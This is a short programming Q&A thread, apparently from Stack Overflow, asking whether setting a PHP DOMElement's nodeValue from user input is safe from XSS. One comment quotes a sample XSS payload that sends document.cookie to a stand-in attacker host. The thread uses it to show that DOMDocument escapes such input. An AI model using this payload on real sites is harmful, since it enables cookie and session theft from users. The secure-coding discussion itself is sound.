# PHP - Is DOMElement->nodeValue = $userInput; XSS safe?

Tags: php, security, xss, domdocument

If I am serving up an HTML page generated by DOMDocument, do I have to worry about XSS vulnerabilities when applying user input to a DOMElement node's value?

```
// (object) Instance of DOMElement
$node->nodeValue = $someUserInput; // <-- Is this safe from XSS attacks?
```

Comment: It depends a lot on context but the short answer is probably yes (it is vulnerable).  Consider if the user input was `<script>document.write('<img src="https://cookiemonster.evil.com/cookies.gif?cookie=' + document.cookie + '" />')</script>`...would that be a vulnerability in your system?

Comment: When I do that I get the following: `&lt;script&gt;document.write('&lt;img src="https://cookiemonster.evil.com/cookies.gif?cookie=' + document.cookie + '" /&gt;')&lt;/script&gt;` Hence the reason for my question. Are their any caveats to DOMDocument's internal nodeValue escaping behaviors?

Comment: My point was that in a more complex situation it might become a problem. E.g if you ever decide to accept html as user input and then disable escaping.  Strictly speaking the code as written shouldn't be vulnerable unless you do something crazy like placing `$someUserInput` in a `<script>` node or use it in an `on*` attribute.